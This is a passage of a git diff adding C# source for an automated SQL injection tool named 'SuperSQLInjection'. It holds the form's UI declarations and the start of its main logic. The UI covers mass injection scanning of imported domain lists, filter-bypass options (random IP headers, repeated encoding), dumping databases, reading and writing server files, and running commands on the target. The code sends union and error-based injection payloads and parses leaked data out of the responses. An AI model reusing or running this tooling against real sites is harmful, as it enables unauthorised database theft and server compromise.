+ this.groupBox3.ResumeLayout(false);
+ this.groupBox3.PerformLayout();
+ this.groupBox16.ResumeLayout(false);
+ this.groupBox16.PerformLayout();
+ this.groupBox15.ResumeLayout(false);
+ this.groupBox15.PerformLayout();
+ this.mytab.ResumeLayout(false);
+ this.tab_cmd.ResumeLayout(false);
+ this.tab_cmd.PerformLayout();
+ this.groupBox8.ResumeLayout(false);
+ this.groupBox8.PerformLayout();
+ this.tab_bypass.ResumeLayout(false);
+ this.groupBox9.ResumeLayout(false);
+ this.groupBox9.PerformLayout();
+ this.bypass_lvw_replaceString_cms.ResumeLayout(false);
+ this.tab_encoding.ResumeLayout(false);
+ this.groupBox13.ResumeLayout(false);
+ this.groupBox13.PerformLayout();
+ this.groupBox11.ResumeLayout(false);
+ this.groupBox11.PerformLayout();
+ this.groupBox10.ResumeLayout(false);
+ this.groupBox10.PerformLayout();
+ this.tab_scanInjection.ResumeLayout(false);
+ this.groupBox14.ResumeLayout(false);
+ this.splitContainer2.Panel1.ResumeLayout(false);
+ this.splitContainer2.Panel2.ResumeLayout(false);
+ ((System.ComponentModel.ISupportInitialize)(this.splitContainer2)).EndInit();
+ this.splitContainer2.ResumeLayout(false);
+ this.scanInjectionURL_cms.ResumeLayout(false);
+ this.scanInjection_cms.ResumeLayout(false);
+ this.groupBox12.ResumeLayout(false);
+ this.groupBox12.PerformLayout();
+ this.statusStrip1.ResumeLayout(false);
+ this.statusStrip1.PerformLayout();
+ this.ResumeLayout(false);
+ this.PerformLayout();
+
+ }
+
+ #endregion
+
+ private System.Windows.Forms.GroupBox gb_basic;
+ private System.Windows.Forms.TextBox txt_basic_host;
+ private System.Windows.Forms.Label label1;
+ private System.Windows.Forms.MenuStrip menuStrip_main;
+ private System.Windows.Forms.ToolStripMenuItem tsmi_menu;
+ private System.Windows.Forms.ToolStripMenuItem tsmi_openConfig;
+ private System.Windows.Forms.ToolStripMenuItem tsmi_saveConfig;
+ private System.Windows.Forms.ToolStripMenuItem tsmi_tools;
+ private System.Windows.Forms.ToolStripMenuItem 脱裤助手ToolStripMenuItem;
+ private System.Windows.Forms.ToolStripMenuItem tsmi_help;
+ private System.Windows.Forms.ToolStripMenuItem tsmi_readme;
+ private System.Windows.Forms.ToolStripMenuItem tsmi_about;
+ private System.Windows.Forms.ToolStripMenuItem tsmi_update;
+ private System.Windows.Forms.Label label6;
+ private System.Windows.Forms.ComboBox cbox_basic_dbType;
+ private System.Windows.Forms.Label label7;
+ private System.Windows.Forms.ComboBox cbox_basic_injectType;
+ private System.Windows.Forms.GroupBox gb_logo;
+ private System.Windows.Forms.TextBox txt_log;
+ private System.Windows.Forms.TextBox txt_basic_port;
+ private System.Windows.Forms.Label label2;
+ private System.Windows.Forms.Button btn_autoInject;
+ private System.Windows.Forms.Label label3;
+ private System.Windows.Forms.Label label5;
+ private System.Windows.Forms.Label label9;
+ private System.Windows.Forms.Label label11;
+ private System.Windows.Forms.ComboBox cbox_basic_encoding;
+ private System.Windows.Forms.ComboBox cbox_basic_timeOut;
+ private System.Windows.Forms.ComboBox cbox_basic_reTryCount;
+ private System.Windows.Forms.ComboBox cbox_basic_threadSize;
+ private System.Windows.Forms.Button btn_exportConfig;
+ private System.Windows.Forms.TabPage tab_logCenter;
+ private System.Windows.Forms.TabPage tab_file;
+ private System.Windows.Forms.TabPage tab_dataCenter;
+ private System.Windows.Forms.TabPage tab_injectCenter;
+ private System.Windows.Forms.GroupBox groupBox1;
+ private System.Windows.Forms.GroupBox groupBox3;
+ private System.Windows.Forms.Label label13;
+ private System.Windows.Forms.Label label12;
+ private System.Windows.Forms.Button btn_inject_clearRequest;
+ private System.Windows.Forms.Button btn_inject_sendData;
+ private System.Windows.Forms.CheckBox chk_inject_foward_302;
+ private System.Windows.Forms.Label label4;
+ private System.Windows.Forms.Button btn_inject_setInject;
+ private System.Windows.Forms.TextBox txt_inject_key;
+ private System.Windows.Forms.TextBox txt_inject_unionColumnsCount;
+ private System.Windows.Forms.Label label8;
+ private System.Windows.Forms.TextBox txt_inject_showColumn;
+ private System.Windows.Forms.TabControl mytab;
+ private System.Windows.Forms.GroupBox groupBox6;
+ private System.Windows.Forms.GroupBox groupBox5;
+ private System.Windows.Forms.ListView log_lvw_httpLog;
+ private System.Windows.Forms.ColumnHeader log_col_payload;
+ private System.Windows.Forms.TabControl tabControl2;
+ private System.Windows.Forms.TabPage tabPage3;
+ private System.Windows.Forms.TabPage tabPage4;
+ private System.Windows.Forms.ToolStripMenuItem toolStripMenuItem1;
+ private System.Windows.Forms.ToolStripMenuItem tsmi_seting;
+ private System.Windows.Forms.ToolStripMenuItem tsmi_mustRead;
+ private System.Windows.Forms.Button btn_inject_setEncodingRange;
+ private System.Windows.Forms.ContextMenuStrip data_cms_vers;
+ private System.Windows.Forms.ToolStripMenuItem data_cms_tsmi_getVariable;
+ private System.Windows.Forms.ToolStripMenuItem data_cms_tsmi_stopGetVariable;
+ private System.Windows.Forms.ContextMenuStrip data_cms_dbs;
+ private System.Windows.Forms.ToolStripMenuItem data_dbs_tsmi_addDBS;
+ private System.Windows.Forms.ToolStripMenuItem data_dbs_tsmi_deleteNode;
+ private System.Windows.Forms.ToolStripMenuItem data_dbs_tsmi_getTableNames;
+ private System.Windows.Forms.ImageList myicon_list;
+ private System.Windows.Forms.TabControl tabC_dataCenter;
+ private System.Windows.Forms.TabPage tab_vers;
+ private System.Windows.Forms.ListView data_lvw_ver;
+ private System.Windows.Forms.ColumnHeader data_lvw_ver_verName;
+ private System.Windows.Forms.ColumnHeader data_lvw_ver_verValue;
+ private System.Windows.Forms.TabPage tab_dbs;
+ private System.Windows.Forms.ToolStrip data_dbs_ts;
+ private System.Windows.Forms.ToolStripButton data_dbs_tsl_getTables;
+ private System.Windows.Forms.ToolStripButton data_dbs_tsl_getColumns;
+ private System.Windows.Forms.GroupBox groupBox4;
+ private System.Windows.Forms.ListView data_dbs_lvw_data;
+ private System.Windows.Forms.GroupBox groupBox2;
+ private System.Windows.Forms.TreeView data_tvw_dbs;
+ private System.Windows.Forms.ColumnHeader log_col_code;
+ private System.Windows.Forms.ColumnHeader log_col_bodyLength;
+ private System.Windows.Forms.TextBox log_txt_request;
+ private System.Windows.Forms.TextBox log_txt_response;
+ private System.Windows.Forms.ColumnHeader log_col_index;
+ private System.Windows.Forms.TextBox txt_inject_request;
+ private System.Windows.Forms.ColumnHeader col_runtime;
+ private System.Windows.Forms.ContextMenuStrip log_cms_dataifo;
+ private System.Windows.Forms.ToolStripMenuItem data_cms_clearLog;
+ private System.Windows.Forms.ToolStripMenuItem data_dbs_tsmi_stopGetInfos;
+ private System.Windows.Forms.SplitContainer splitContainer1;
+ private System.Windows.Forms.SplitContainer spc_dbs;
+ private System.Windows.Forms.ToolStrip toolStrip1;
+ private System.Windows.Forms.ToolStripLabel toolStripLabel1;
+ private System.Windows.Forms.ToolStripTextBox data_dbs_txt_count;
+ private System.Windows.Forms.ToolStripButton data_dbs_tsl_getDatas;
+ private System.Windows.Forms.ToolStripButton data_dbs_tsl_exportDatas;
+ private System.Windows.Forms.ToolStripButton data_dbs_tsl_getDBS;
+ private System.Windows.Forms.ToolStripLabel toolStripLabel2;
+ private System.Windows.Forms.ToolStripComboBox data_dbs_cob_db_encoding;
+ private System.Windows.Forms.CheckBox chk_openURLEncoding;
+ private System.Windows.Forms.ToolStripMenuItem data_cms_tsmi_copyVerValue;
+ private System.Windows.Forms.TabPage tab_encoding;
+ private System.Windows.Forms.TabPage tab_cmd;
+ private System.Windows.Forms.CheckBox chk_useSSL;
+ private System.Windows.Forms.TabPage tabPage1;
+ private System.Windows.Forms.WebBrowser webBro_log;
+ private System.Windows.Forms.ToolStripLabel toolStripLabel3;
+ private System.Windows.Forms.ToolStripTextBox data_dbs_txt_start;
+ private System.Windows.Forms.ImageList imglist_database;
+ private System.Windows.Forms.ContextMenuStrip cms_data_dbs_lvw_data;
+ private System.Windows.Forms.ToolStripMenuItem data_dbs_lvw_tsmi_stop;
+ private System.Windows.Forms.ToolStripMenuItem data_dbs_lvw_tsmi_copyLineData;
+ private System.Windows.Forms.CheckBox chk_inject_reverseKey;
+ private System.Windows.Forms.GroupBox groupBox7;
+ private System.Windows.Forms.Label label14;
+ private System.Windows.Forms.TextBox file_txt_filePath;
+ private System.Windows.Forms.ComboBox file_cbox_readWrite;
+ private System.Windows.Forms.Button file_btn_start;
+ private System.Windows.Forms.TextBox file_txt_result;
+ private System.Windows.Forms.GroupBox groupBox8;
+ private System.Windows.Forms.Button cmd_btn_start;
+ private System.Windows.Forms.TextBox cmd_txt_cmd;
+ private System.Windows.Forms.Label label15;
+ private System.Windows.Forms.TextBox cmd_txt_result;
+ private System.Windows.Forms.StatusStrip statusStrip1;
+ private System.Windows.Forms.ToolStripStatusLabel toolStripStatusLabel1;
+ private System.Windows.Forms.ToolStripStatusLabel status_lbl_time;
+ private System.Windows.Forms.ToolStripStatusLabel toolStripStatusLabel2;
+ private System.Windows.Forms.ToolStripStatusLabel status_lbl_threadStatus;
+ private System.Windows.Forms.ToolStripStatusLabel toolStripStatusLabel3;
+ private System.Windows.Forms.ToolStripStatusLabel toolStripStatusLabel4;
+ private System.Windows.Forms.ToolStripStatusLabel status_lbl_dbsCount;
+ private System.Windows.Forms.ToolStripStatusLabel status_lbl_tableCount;
+ private System.Windows.Forms.ToolStripStatusLabel toolStripStatusLabel5;
+ private System.Windows.Forms.ToolStripStatusLabel toolStripStatusLabel6;
+ private System.Windows.Forms.ToolStripStatusLabel status_lbl_dataCount;
+ private System.Windows.Forms.Timer timer_status;
+ private System.Windows.Forms.ToolStripStatusLabel toolStripStatusLabel7;
+ private System.Windows.Forms.ToolStripStatusLabel status_lbl_runStatus;
+ private System.Windows.Forms.CheckBox cmd_chk_showCmdResult;
+ private System.Windows.Forms.TabPage tab_bypass;
+ private System.Windows.Forms.ContextMenuStrip bypass_lvw_replaceString_cms;
+ private System.Windows.Forms.ToolStripMenuItem bypass_delselect;
+ private System.Windows.Forms.Button injectConfig_btn_checkKey;
+ private System.Windows.Forms.ColumnHeader log_col_sleepTime;
+ private System.Windows.Forms.TextBox encode_txt_result;
+ private System.Windows.Forms.TextBox encode_txt_input;
+ private System.Windows.Forms.ComboBox encode_cbox_decode;
+ private System.Windows.Forms.ComboBox encode_cbox_encode;
+ private System.Windows.Forms.TabPage tab_scanInjection;
+ private System.Windows.Forms.Button inject_btn_autoFindKey;
+ private System.Windows.Forms.Button scanInjection_btn_spider;
+ private System.Windows.Forms.Label label20;
+ private System.Windows.Forms.TextBox scanInjection_txt_domainsPath;
+ private System.Windows.Forms.Button scanInjection_importDomains;
+ private System.Windows.Forms.ListView scanInjection_lvw_result;
+ private System.Windows.Forms.ColumnHeader col_index;
+ private System.Windows.Forms.ColumnHeader col_injectionType;
+ private System.Windows.Forms.ColumnHeader col_param;
+ private System.Windows.Forms.ColumnHeader col_testURL;
+ private System.Windows.Forms.Label scanInjection_domainsCount;
+ private System.Windows.Forms.Label label22;
+ private System.Windows.Forms.Label scanInjection_scanedURLSCount;
+ private System.Windows.Forms.Label scanInjection_findURLSCount;
+ private System.Windows.Forms.Label label30;
+ private System.Windows.Forms.Label label26;
+ private System.Windows.Forms.Label scanInjection_scanedDomainCount;
+ private System.Windows.Forms.Label label25;
+ private System.Windows.Forms.Timer timer_scanInjection;
+ private System.Windows.Forms.ContextMenuStrip scanInjection_cms;
+ private System.Windows.Forms.ToolStripMenuItem scanInjection_cms_exportResult;
+ private System.Windows.Forms.ToolStripMenuItem scanInjection_cms_copyURL;
+ private System.Windows.Forms.ColumnHeader col_mark;
+ private System.Windows.Forms.ToolStripMenuItem scanInjection_cms_clearResult;
+ private System.Windows.Forms.ToolStripMenuItem scanInjection_cms_delThisLine;
+ private System.Windows.Forms.SplitContainer splitContainer2;
+ private System.Windows.Forms.ListBox scanInject_lsb_links;
+ private System.Windows.Forms.CheckBox scanInect_chk_isSpider;
+ private System.Windows.Forms.CheckBox scanInect_chk_scanError;
+ private System.Windows.Forms.GroupBox groupBox11;
+ private System.Windows.Forms.GroupBox groupBox10;
+ private System.Windows.Forms.Label label23;
+ private System.Windows.Forms.Label label21;
+ private System.Windows.Forms.GroupBox groupBox13;
+ private System.Windows.Forms.ToolStripMenuItem data_dbs_tsmi_addTableOrColumn;
+ private System.Windows.Forms.Button scanInjection_btn_scan;
+ private System.Windows.Forms.GroupBox groupBox14;
+ private System.Windows.Forms.GroupBox groupBox12;
+ private System.Windows.Forms.ContextMenuStrip scanInjectionURL_cms;
+ private System.Windows.Forms.ToolStripMenuItem tsmi_exportScanInjectionURL;
+ private System.Windows.Forms.ToolStripMenuItem tsmi_clearScanInjectionURL;
+ private System.Windows.Forms.GroupBox groupBox15;
+ private System.Windows.Forms.GroupBox groupBox16;
+ private System.Windows.Forms.ColumnHeader col_injectionDB;
+ private System.Windows.Forms.ToolStripStatusLabel toolStripStatusLabel8;
+ private System.Windows.Forms.ToolStripStatusLabel status_lbl_all_status;
+ private System.Windows.Forms.ComboBox cbox_file_readFileEncoding;
+ private System.Windows.Forms.Label label24;
+ private System.Windows.Forms.ToolStripMenuItem 版本ToolStripMenuItem;
+ private System.Windows.Forms.ToolStripMenuItem data_dbs_tsmi_saveDTCStruct;
+ private System.Windows.Forms.ToolStripMenuItem data_dbs_tsmi_loadDTCStruct;
+ private System.Windows.Forms.ToolStripMenuItem data_dbs_tsmi_clearDTCStruct;
+ private System.Windows.Forms.ComboBox cbox_inject_type;
+ private System.Windows.Forms.Label label27;
+ private System.Windows.Forms.ContextMenuStrip cms_dataPacks;
+ private System.Windows.Forms.ToolStripMenuItem tsmi_createGetTemplate;
+ private System.Windows.Forms.ToolStripMenuItem tsmi_createPOSTTemplate;
+ private System.Windows.Forms.ToolStripMenuItem tsmi_changeRequestMethod;
+ private System.Windows.Forms.ToolStripMenuItem tsmi_clearColumns;
+ private System.Windows.Forms.ToolStripMenuItem tsmi_bugReport;
+ private System.Windows.Forms.GroupBox groupBox9;
+ private System.Windows.Forms.ComboBox cob_keyRepalce;
+ private System.Windows.Forms.Label label10;
+ private System.Windows.Forms.CheckBox bypass_chk_base64;
+ private System.Windows.Forms.ComboBox bypass_cbox_randIPToHeader;
+ private System.Windows.Forms.Label label18;
+ private System.Windows.Forms.Label label17;
+ private System.Windows.Forms.ComboBox bypass_cbox_sendHTTPSleepTime;
+ private System.Windows.Forms.CheckBox bypass_chk_inculdeStr;
+ private System.Windows.Forms.Label label16;
+ private System.Windows.Forms.TextBox bypass_txt_replaceTo;
+ private System.Windows.Forms.TextBox bypass_txt_replace;
+ private System.Windows.Forms.ListView bypass_lvw_replaceString;
+ private System.Windows.Forms.ColumnHeader col_replace;
+ private System.Windows.Forms.ColumnHeader col_replaceTo;
+ private System.Windows.Forms.Button bypass_btn_addReplaceStr;
+ private System.Windows.Forms.Label label19;
+ private System.Windows.Forms.CheckBox chk_reaplaceBeforURLEncode;
+ private System.Windows.Forms.ToolStripStatusLabel lbl_packsCount;
+ private System.Windows.Forms.ToolStripStatusLabel toolStripStatusLabel11;
+ private System.Windows.Forms.ToolStripMenuItem tsmi_createPackByURL;
+ private System.Windows.Forms.ColumnHeader col_url;
+ private System.Windows.Forms.ToolStripMenuItem tsmi_openURL;
+ private System.Windows.Forms.ToolStripMenuItem tsmi_tsmi_opentestURL;
+ private System.Windows.Forms.ComboBox bypass_cbox_loadTemplate;
+ private System.Windows.Forms.Label label28;
+ private System.Windows.Forms.Button bypass_btn_saveTemplate;
+ private System.Windows.Forms.ComboBox cbox_base64Count;
+ private System.Windows.Forms.ToolStripMenuItem tsmi_tsmi_exortOldURL;
+ private System.Windows.Forms.ToolStripMenuItem tsmi_tsmi_exortTestURL;
+ private System.Windows.Forms.ComboBox cbox_bypass_urlencode_count;
+ }
+}
+
diff --git a/SuperSQLInjection/Main.cs b/SuperSQLInjection/Main.cs
new file mode 100644
index 0000000..6a44632
--- /dev/null
+++ b/SuperSQLInjection/Main.cs
@@ -0,0 +1,7207 @@
+using System;
+using System.Collections.Generic;
+using System.ComponentModel;
+using System.Data;
+using System.Drawing;
+using System.Text;
+using System.Windows.Forms;
+using tools;
+using System.Threading;
+using SuperSQLInjection.tools;
+using model;
+using SuperSQLInjection.model;
+using SuperSQLInjection.payload;
+using System.Diagnostics;
+using System.Text.RegularExpressions;
+using System.IO;
+using System.Collections;
+using SuperSQLInjection.scan;
+using System.Web;
+using System.Net;
+
+namespace SuperSQLInjection
+{
+ public partial class Main : Form
+ {
+ public Main()
+ {
+ InitializeComponent();
+ Control.CheckForIllegalCrossThreadCalls = false;
+ }
+ public ShowResponse sr = null;
+ public Config config = new Config();//注入基础配置
+
+ public String curren_db = "";//当前数据库
+ public String curren_table = "";//当前表
+ public static int status = 0;
+
+ public int currentDbsCount = 0;
+ public int currentTableCount = 0;
+ public int currentDataCount = 0;
+ public int dbsCount = 0;
+ public int tableCount = 0;
+ public int dataCount = 0;
+ public int runTime = 0;
+ public const String setInjectStr = "#inject#";
+ public Dictionary serverinfo_list = new Dictionary();
+ public Hashtable replaceList = new Hashtable();
+ public HashSet scan_list = new HashSet();
+ public int loadListStatus = 0;//注入双击导入扫描URL
+
+ public static int comm_count = 0;//猜测的表数量
+
+ public static int comm_currentCount = 0;//猜测的数量
+
+ public int injectionURLCount = 0;//注入URL数
+
+ delegate void showLogDelegate(String log);
+
+ public void showLog(String log)
+ {
+ this.txt_log.AppendText(log + "\r\n");
+ }
+
+ public void sendRequestAndShowResponse()
+ {
+ if (this.sr != null)
+ {
+ this.sr.Close();
+ }
+
+ if (Thread.CurrentThread.Name == null)
+ {
+ Thread.CurrentThread.Name = "SendThread-";
+ }
+ ServerInfo server = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, "", this.txt_inject_request.Text, config.timeOut, config.encoding, config.is_foward_302,config.redirectDoGet);
+ if (server.timeout)
+ {
+ MessageBox.Show("连接超时!");
+ }
+ else
+ {
+ ShowResponse sr = new ShowResponse();
+ sr.server = server;
+ this.sr = sr;
+ sr.ShowDialog();
+ }
+
+ }
+
+ public void sendRequestAndShowResponseInvoke()
+ {
+ this.Invoke(new delegateVoid(sendRequestAndShowResponse));
+ }
+
+ delegate void delegateVoid();
+
+ private void btn_inject_sendData_Click(object sender, EventArgs e)
+ {
+ if (checkSendDataConfig())
+ {
+ Thread t = new Thread(sendRequestAndShowResponseInvoke);
+ t.Start();
+ }
+ }
+
+ private void Main_Shown(object sender, EventArgs e)
+ {
+ //初始化配置
+
+ this.cbox_basic_encoding.SelectedIndex = 0;
+ this.cbox_basic_threadSize.SelectedIndex = 9;
+ this.cbox_basic_timeOut.SelectedIndex = 4;
+ this.cbox_basic_reTryCount.SelectedIndex = 1;
+ this.data_dbs_cob_db_encoding.SelectedIndex = 0;
+ this.file_cbox_readWrite.SelectedIndex = 0;
+ this.bypass_cbox_sendHTTPSleepTime.SelectedIndex = 0;
+ this.cbox_bypass_urlencode_count.SelectedIndex = 0;
+
+ HTTP.main = this;
+ //清空日志
+ Thread t = new Thread(Tools.delHTTPLog);
+ t.Start();
+ try
+ {
+ this.config = XML.readConfig("lastConfig.xml");
+ reloadConfig(this.config);
+ }
+ catch (Exception ex)
+ {
+ Tools.SysLog("加载配置发生错误!" + ex.Message);
+ }
+ this.Invoke(new StringDelegate(log), "自动加载上次配置成功!");
+ InjectionTools.addErrorCode();
+ //读取模板
+ List templates=FileTool.readAllDic("/config/template/");
+ foreach (String templateName in templates)
+ {
+ this.bypass_cbox_loadTemplate.Items.Add(templateName);
+ }
+ if (config.isAutoCheckUpdate)
+ {
+ new Thread(checkUpdate).Start();
+ }
+
+ }
+ public void HttpDownloadFile(string url, string path)
+ {
+ // 设置参数
+ HttpWebRequest request = WebRequest.Create(url) as HttpWebRequest;
+
+ //发送请求并获取相应回应数据
+ HttpWebResponse response = request.GetResponse() as HttpWebResponse;
+ //直到request.GetResponse()程序才开始向目标网页发送Post请求
+ Stream responseStream = response.GetResponseStream();
+
+ //创建本地文件写入流
+ Stream stream = new FileStream(path, FileMode.Create);
+
+ byte[] bArr = new byte[1024];
+ int size = responseStream.Read(bArr, 0, (int)bArr.Length);
+ while (size > 0)
+ {
+ stream.Write(bArr, 0, size);
+ size = responseStream.Read(bArr, 0, (int)bArr.Length);
+ }
+ stream.Close();
+ responseStream.Close();
+ }
+
+ public static int version = 20160525;
+ public static String versionURL = "http://www.shack2.org/soft/SSuperSQLInjection/version.txt";
+ //检查更新
+ public void checkUpdate()
+ {
+ try
+ {
+ String[] result = HttpTools.getHtml(versionURL, 30).Split('-');
+ String versionText = result[0];
+ int cversion = int.Parse(result[1]);
+ String versionUpdateURL = result[2];
+ if (cversion > version)
+ {
+ DialogResult dr = MessageBox.Show("发现新版本:" + versionText + ",更新日期:" + cversion + ",立即更新吗?", "提示", MessageBoxButtons.OKCancel);
+
+ if (DialogResult.OK.Equals(dr))
+ {
+ try
+ {
+ int index = versionUpdateURL.LastIndexOf("/");
+ String filename = "update.rar";
+ if (index != -1){
+ filename = versionUpdateURL.Substring(index);
+ }
+ HttpDownloadFile(versionUpdateURL, AppDomain.CurrentDomain.BaseDirectory + filename);
+ MessageBox.Show("更新成功,请将解压后运行!");
+ }
+
+ catch (Exception other)
+ {
+ MessageBox.Show("更新失败,请访问官网更新!" + other.GetBaseException());
+ }
+ }
+ }
+ else
+ {
+
+ MessageBox.Show("自动检查更新,没有发现新版本!");
+ }
+ }
+ catch (Exception e)
+ {
+ MessageBox.Show("未发现新版本!");
+ }
+ }
+
+ /***
+ * 检查配置是否完整
+ *
+ * **/
+
+ public Boolean checkConfig()
+ {
+
+ if ("".Equals(this.txt_basic_host.Text))
+ {
+ MessageBox.Show("描述没有填写目标地址!");
+ return false;
+ }
+
+ config.domain = this.txt_basic_host.Text;
+
+ try
+ {
+ config.port = int.Parse(this.txt_basic_port.Text);
+ }
+ catch (Exception e)
+ {
+ MessageBox.Show("把目标端口写上吧!");
+
+ return false;
+ }
+
+ if (InjectType.UnKnow.Equals(config.injectType))
+ {
+ MessageBox.Show("注入类型还未设置,您可以人工设置或点击自动识别!");
+ return false;
+ }
+
+ switch (this.cbox_basic_injectType.SelectedIndex)
+ {
+ case 0:
+ config.injectType = InjectType.UnKnow;
+ break;
+ case 1:
+ config.injectType = InjectType.Bool;
+ break;
+ case 2:
+ config.injectType = InjectType.Error;
+ break;
+ case 3:
+ config.injectType = InjectType.Union;
+ break;
+ case 4:
+ config.injectType = InjectType.Sleep;
+ break;
+ }
+
+ if (DBType.UnKnow.Equals(config.dbType))
+ {
+ MessageBox.Show("数据库类型还未设置,您可以人工设置或点击自动识别!");
+ return false;
+ }
+
+ switch (this.cbox_basic_dbType.SelectedIndex)
+ {
+ case 0:
+ config.dbType = DBType.UnKnow;
+ break;
+ case 1:
+ config.dbType = DBType.Access;
+ break;
+ case 2:
+ config.dbType = DBType.MySQL5;
+ break;
+ case 3:
+ config.dbType = DBType.SQLServer;
+ break;
+ case 4:
+ config.dbType = DBType.Oracle;
+ break;
+ case 5:
+ config.dbType = DBType.MySQL4;
+ break;
+ }
+
+
+ try
+ {
+ config.timeOut = int.Parse(this.cbox_basic_timeOut.Text);
+ }
+ catch (Exception e)
+ {
+ MessageBox.Show("每次请求多少时间?没响应我就放弃啦!");
+ return false;
+ }
+
+
+ if ("".Equals(this.cbox_basic_encoding.Text))
+ {
+ MessageBox.Show("网页是啥编码呢?我不会去猜的,赶快告诉我!");
+ return false;
+ }
+ config.encoding = this.cbox_basic_encoding.Text;
+
+ try
+ {
+ config.threadSize = int.Parse(this.cbox_basic_threadSize.Text);
+ }
+ catch (Exception e)
+ {
+ MessageBox.Show("大侠,同时启动多少个线程呢!");
+ return false;
+ }
+
+ try
+ {
+ config.reTry = int.Parse(this.cbox_basic_reTryCount.Text);
+ }
+ catch (Exception e)
+ {
+ MessageBox.Show("失败了不能放弃,我能试几次?");
+ return false;
+ }
+
+ if (this.cbox_basic_injectType.SelectedIndex == 0 && this.txt_inject_key.Text == "")
+ {
+ MessageBox.Show("盲注需要设置关键字,这个关键字呢,就是正常时(and 1=1)存在的字符,而不正常时(and 1=2)不存在的字符!");
+ return false;
+ }
+
+ if (this.cbox_basic_injectType.SelectedIndex == 1 && (this.txt_inject_unionColumnsCount.Text.Length <= 0 || this.txt_inject_showColumn.Text.Length <= 0))
+ {
+ MessageBox.Show("Union注入需要设置查询总列数和数据显示列!");
+ return false;
+ }
+
+ config.key = this.txt_inject_key.Text;
+
+ if (this.txt_inject_request.Text == "")
+ {
+ MessageBox.Show("没有设置数据包!");
+ return false;
+ }
+
+ config.request = this.txt_inject_request.Text;
+ //设置线程池控制
+ ThreadPool.SetMinThreads(config.threadSize, config.threadSize);
+ MyThreadPool.maxThread = config.threadSize;
+ return true;
+
+ }
+
+ public Boolean checkSendDataConfig()
+ {
+ if ("".Equals(this.txt_inject_request.Text))
+ {
+ MessageBox.Show("没有数据包!");
+ return false;
+ }
+
+ if ("".Equals(this.txt_basic_host.Text))
+ {
+ MessageBox.Show("描述没有填写目标地址!");
+ return false;
+ }
+
+ config.domain = this.txt_basic_host.Text;
+
+ try
+ {
+ config.port = int.Parse(this.txt_basic_port.Text);
+ }
+ catch (Exception e)
+ {
+ MessageBox.Show("把目标端口写上吧!");
+ return false;
+ }
+
+ try
+ {
+ config.timeOut = int.Parse(this.cbox_basic_timeOut.Text);
+ }
+ catch (Exception e)
+ {
+ MessageBox.Show("每次请求多少时间?没响应我就放弃啦!");
+ return false;
+ }
+
+
+ if ("".Equals(this.cbox_basic_encoding.Text))
+ {
+ MessageBox.Show("网页是啥编码呢?我不会去猜的,赶快告诉我!");
+ return false;
+ }
+ config.encoding = this.cbox_basic_encoding.Text;
+
+ try
+ {
+ config.threadSize = int.Parse(this.cbox_basic_threadSize.Text);
+ }
+ catch (Exception e)
+ {
+ MessageBox.Show("每次请求多少时间?没响应我就放弃啦!");
+ return false;
+ }
+ config.is_foward_302 = this.chk_inject_foward_302.Checked;
+ return true;
+
+ }
+ public void getVariablesBySleep(DBType dbType)
+ {
+
+
+
+
+ }
+ ///
+ /// 获得union获得error注入的获得的数据内容
+ ///
+ ///
+ ///
+ public String getOneDataByUnionOrError(String opayload)
+ {
+
+ try
+ {
+ ServerInfo server = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, opayload.ToString(), config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+
+ if (server.body != null && server.body.Length > 0)
+ {
+ //查找格式^^!col$$$col!^^
+ Match m = Regex.Match(server.body, "(?<=(\\^\\^\\!))[.\\s\\S]*?(?=(\\!\\^\\^))");
+ if (m.Success)
+ {
+ return m.Value;
+ }
+ }
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "发生异常:" + e.Message);
+
+ }
+ return "";
+ }
+
+
+
+ ///
+ /// 获得union error注入的获得的hex数据内容
+ ///
+ ///
+ ///
+ public String getOneHexDataByUnionOrError(String opayload)
+ {
+
+ try
+ {
+ ServerInfo server = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, opayload.ToString(), config.request, config.timeOut, config.encoding, config.is_foward_302,config.redirectDoGet);
+
+ if (server.body != null && server.body.Length > 0)
+ {
+ //查找格式
+ Match m = Regex.Match(server.body, "(?<=(\\-\\-\\:))[.\\s\\S]*?(?=(\\:\\-\\-))");
+ if (m.Success)
+ {
+ return Tools.unHex(m.Value, config.db_encoding);
+ }
+ }
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "发生异常:" + e.Message);
+
+ }
+ return "";
+ }
+
+ public String getOneHexNoUnHexDataByUnionOrError(String opayload)
+ {
+
+ try
+ {
+ ServerInfo server = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, opayload.ToString(), config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+
+ if (server.body != null && server.body.Length > 0)
+ {
+ //查找格式
+ Match m = Regex.Match(server.body, "(?<=(\\-\\-\\:))[.\\s\\S]*?(?=(\\:\\-\\-))");
+ if (m.Success)
+ {
+ return m.Value;
+ }
+ }
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "发生异常:" + e.Message);
+
+ }
+ return "";
+ }
+
+
+ public void getVariablesByUnionByMySQL5(Object v)
+ {
+ if (status == 0)
+ {
+
+ Thread.CurrentThread.Abort();
+ }
+ String[] sv = v.ToString().Split(':');
+ List column_list = new List();
+ column_list.Add(sv[1]);
+ String columns = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, "1", column_list, null, null, -1);
+ String pay_load = MySQL5.union_value.Replace("{data}", columns);
+ String result = getOneDataByUnionOrError(pay_load);
+ this.Invoke(new setVariableDelegate(setVariable), sv[0], result);
+ }
+
+ public void getVariablesByUnionBySQLServer(Object v)
+ {
+
+ String[] sv = v.ToString().Split(':');
+ String pay_load = MSSQL.getUnionDataValue(config.columnsCount, config.showColumn, 1, sv[1]);
+ String result = getOneDataByUnionOrError(pay_load);
+ this.Invoke(new setVariableDelegate(setVariable), sv[0], result);
+ }
+
+ public void getVariablesByUnionByOracle(Object v)
+ {
+
+ String[] sv = v.ToString().Split(':');
+ String pay_load = Oracle.getUnionDataValue(config.columnsCount, config.showColumn, sv[1], "", "", "");
+ String result = getOneDataByUnionOrError(pay_load);
+ this.Invoke(new setVariableDelegate(setVariable), sv[0], result);
+ }
+
+ public void getVariablesByErrorByMySQL5(Object v)
+ {
+ String[] sv = v.ToString().Split(':');
+ List column_list = new List();
+ column_list.Add(sv[1]);
+ String columns = MySQL5.creatMySQLColumnsStrByError(column_list, null, null, -1);
